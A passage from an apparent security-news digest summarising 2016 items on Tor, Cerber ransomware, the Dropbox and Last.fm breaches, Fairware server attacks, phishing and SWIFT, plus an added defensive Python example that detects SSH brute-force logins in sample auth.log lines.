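The parent rule also covers the public-suffix case in the story without special handling: github.io is the parent of anaccount.github.io, so control of the latter never yields the former. A real CA additionally has to consult the public suffix list so that a validated name that is itself a suffix (co.uk, github.io) is not accepted as a base for a wildcard.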
#1403 Building a new Tor that can resist next-generation state surveillance
Since Edward Snowden stepped into the limelight from a hotel room in Hong Kong three years ago, use of the Tor anonymity network has grown massively. Journalists and activists have embraced the anonymity the network provides as a way to evade the mass surveillance under which we all now live, while citizens in countries with restrictive Internet censorship, like Turkey or Saudi Arabia, have turned to Tor in order to circumvent national firewalls. Law enforcement has been less enthusiastic, worrying that online anonymity also enables criminal activity.

Tor's growth in users has not gone unnoticed, and today the network first dubbed "The Onion Router" is under constant strain from those wishing to identify anonymous Web users. The NSA and GCHQ have been studying Tor for a decade, looking for ways to penetrate online anonymity, at least according to documents leaked by Snowden. In 2014, the US government paid Carnegie Mellon University to run a series of poisoned Tor relays to de-anonymise Tor users. A 2015 research paper outlined an attack effective, under certain circumstances, at decloaking Tor hidden services (now rebranded as "onion services"). Most recently, 110 poisoned Tor hidden service directories were discovered probing .onion sites for vulnerabilities, most likely in an attempt to de-anonymise both the servers and their visitors.
#1402 New version of Cerber ransomware distributed via malvertising
Cerber has become one of the most notorious and popular ransomware families in 2016. It has used a wide variety of tactics including leveraging cloud platforms and Windows Scripting and adding non-ransomware behavior such as distributed denial-of-service attacks to its arsenal. One reason for this popularity may be because it is frequently bought and sold as a service (ransomware-as-a-service, or RaaS).

The latest version of Cerber retains functions found in earlier versions, such as the use of a voice mechanism as part of its social engineering tactics. As with previous variants, Cerber 3.0 is dropped by the Magnitude and Rig exploit kits.
#1401 Dropbox hackers stole e-mail addresses, hashed passwords from 68M accounts
Dropbox hurriedly warned its users last week to change their passwords if their accounts dated back to before mid-2012. We now know why: the cloud-based storage service suffered a data breach said to have affected more than 68 million accounts, compromised in a hack that took place roughly four years ago.

The company had previously admitted that it was hit by a hack attack, but it's only now that the scale of the operation has seemingly come to light.

Tech site Motherboard reported—citing "sources in the database trading community"—that it had obtained four files, totalling 5GB in size, which apparently contained e-mail addresses and hashed passwords for 68,680,741 Dropbox users.
#1400 Fairware attacks targeting Linux servers
Linux server admins are reporting attacks resulting in the disappearance of the server’s web folder and websites being down indefinitely.

Posts to the forums on the BleepingComputer website corroborate a number of such attacks, most likely intrusions powered by brute-force attacks against SSH, according to one of the victims. In each instance, the web folder is deleted and a read_me file is left behind containing a link to a Pastebin page hosting a ransom note. The note demands two Bitcoin in exchange for the safe return of the files.
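Since the victims attribute the intrusions to SSH brute forcing, the run-up to an attack like this is visible in sshd's log long before the web folder disappears. The example below is added here and is not from the BleepingComputer thread; the auth.log lines are constructed for the demonstration, and the year is an assumption because syslog lines carry none. It flags a source address that fails logins faster than a threshold inside a sliding window, then reports any login that address completes afterwards, which is the signal that the brute force worked.

```python
"""Added example (not from the BleepingComputer thread): spotting an SSH
brute-force run, and a success after it, in sshd log lines. The log lines
are constructed for the demonstration; the year is assumed (syslog has none)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log lines in syslog format.
SAMPLE_AUTH_LOG = """\
Aug 29 03:14:01 web1 sshd[2201]: Failed password for root from 203.0.113.9 port 51022 ssh2
Aug 29 03:14:03 web1 sshd[2203]: Failed password for root from 203.0.113.9 port 51030 ssh2
Aug 29 03:14:04 web1 sshd[2205]: Failed password for invalid user admin from 203.0.113.9 port 51041 ssh2
Aug 29 03:14:06 web1 sshd[2207]: Failed password for root from 203.0.113.9 port 51055 ssh2
Aug 29 03:14:08 web1 sshd[2209]: Failed password for root from 203.0.113.9 port 51067 ssh2
Aug 29 03:14:09 web1 sshd[2211]: Failed password for root from 203.0.113.9 port 51072 ssh2
Aug 29 03:14:11 web1 sshd[2213]: Accepted password for root from 203.0.113.9 port 51080 ssh2
Aug 29 03:20:44 web1 sshd[2300]: Failed password for deploy from 198.51.100.7 port 40100 ssh2
Aug 29 03:21:02 web1 sshd[2302]: Accepted publickey for deploy from 198.51.100.7 port 40101 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse(lines, year=2016):
    """Return [(timestamp, result, method, user, ip)] for login outcome lines;
    other sshd messages (session opened, disconnects) are skipped."""
    events = []
    for line in lines.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def detect_bruteforce(lines, threshold=5, window_s=60, year=2016):
    """Flag a source IP once it has >= threshold failed logins inside any
    window_s-second window, and record every login that IP completes after
    being flagged: a success following a burst of failures is the event to
    page on, not the failures themselves."""
    events = sorted(parse(lines, year))
    recent_failures = defaultdict(list)   # ip -> failure times inside the window
    flagged = {}                          # ip -> time the threshold was crossed
    compromised = []
    for ts, result, method, user, ip in events:
        if result == "Failed":
            q = recent_failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.pop(0)
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
        elif ip in flagged:
            compromised.append({"ip": ip, "user": user, "method": method, "at": ts})
    return {"flagged": flagged, "compromised": compromised}


if __name__ == "__main__":
    findings = detect_bruteforce(SAMPLE_AUTH_LOG)
    for ip, at in findings["flagged"].items():
        print(f"brute force from {ip} crossed threshold at {at}")
    for c in findings["compromised"]:
        print(f"LIKELY COMPROMISE: {c['user']} via {c['method']} from {c['ip']} at {c['at']}")
```

On a server where root password logins are allowed, the "Accepted password for root" line after the burst is the whole story; the fix that makes the detection moot is key-only authentication with PasswordAuthentication and PermitRootLogin disabled, plus a rate limiter such as fail2ban in front of the port. None of that restores a deleted web folder, which is why the other half of the defence here is a backup that the compromised account cannot reach.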
#1399 So much for counter-phishing training: Half of people click anything sent to them
Security experts often talk about the importance of educating people about the risks of "phishing" e-mails containing links to malicious websites. But sometimes, even awareness isn't enough. A study by researchers at a university in Germany found that about half of the subjects in a recent experiment clicked on links from strangers in e-mails and Facebook messages—even though most of them claimed to be aware of the risks.

The researchers at the Friedrich-Alexander University (FAU) of Erlangen-Nuremberg, Germany, led by FAU Computer Science Department Chair Dr Zinaida Benenson, revealed the initial results of the study at this month's Black Hat security conference. Simulated "spear phishing" attacks were sent to 1,700 test subjects—university students—from fake accounts.
#1398 Thousands of security threats happen every five minutes: Trend Micro VP
In just five minutes, files on a company's network can be encrypted and beyond its reach, according to Rik Ferguson, vice president of Security Research at Trend Micro.

Trend Micro has seen a lot of development around ransomware capabilities targeting businesses rather than consumers, Ferguson said during his keynote speech at Cloudsec Australia 2016 in Sydney on Thursday, with 1,800 new threats released out into the wild every five minutes.

Additionally, he said that more than 800,000 people are exposed to malicious URLs, exploit kits, phishing websites, malware, spam, and threats every five minutes, with almost 7,000 records on average being exposed in the same timeframe.

"Just so we can measure the speed of things, the fastest trains today ... can reach top speed of about 450km/h. That means in five minutes, you can travel close to 40 kilometres. That's an incredible distance to be able to go in a very, very short period of time," Ferguson pointed out.
#1397 SWIFT warns banks of more cyberattacks
Reports of additional attacks against banks that use SWIFT, the global financial transaction messaging network, came to light Wednesday. The attacks were reportedly persistent, sophisticated and in some cases successful, impacting an undisclosed number of financial institutions.

It’s the latest development since February when cybercriminals used SWIFT to steal $81 million in a Bangladesh Bank heist. Reports of the latest bank attacks come from a private letter obtained by the Reuters news agency, sent by SWIFT to its clients informing them of the attacks and urging them to shore up their cyber defenses.

The letter told clients that SWIFT customer “environments” have been compromised and that the possibility of a “threat is persistent, adaptive and sophisticated – and it is here to stay,” according to Reuters.

#1396 Chrome 53 fixes address spoofing vulnerability and 32 other bugs
Google continued its onslaught of summer Chrome patches Wednesday when it pushed out version 53 of the browser, fixing 33 bugs, half of which were rated “high” severity by the company.

Google paid at least $56,500 in rewards to researchers who discovered vulnerabilities in the browser this time through. The company is still determining how much to award several researchers who found bugs, while two vulnerabilities marked Wednesday were ultimately not applicable to the company’s bug bounty program.
#1395 Hackers stole over 43 million Last.fm accounts in 2012 breach
New details about a historical hack of music website Last.fm have come to light.

Last.fm, owned by CBS (which also owns ZDNet and sister website CNET), suffered a data breach in 2012, but details of the attack were not disclosed. Reports suggested the service had an estimated 40 million users at the time.

On Thursday, breach notification site LeakedSource, which obtained a copy of the database and posted details of the hack in a blog post, said more than 43.5 million accounts were stolen.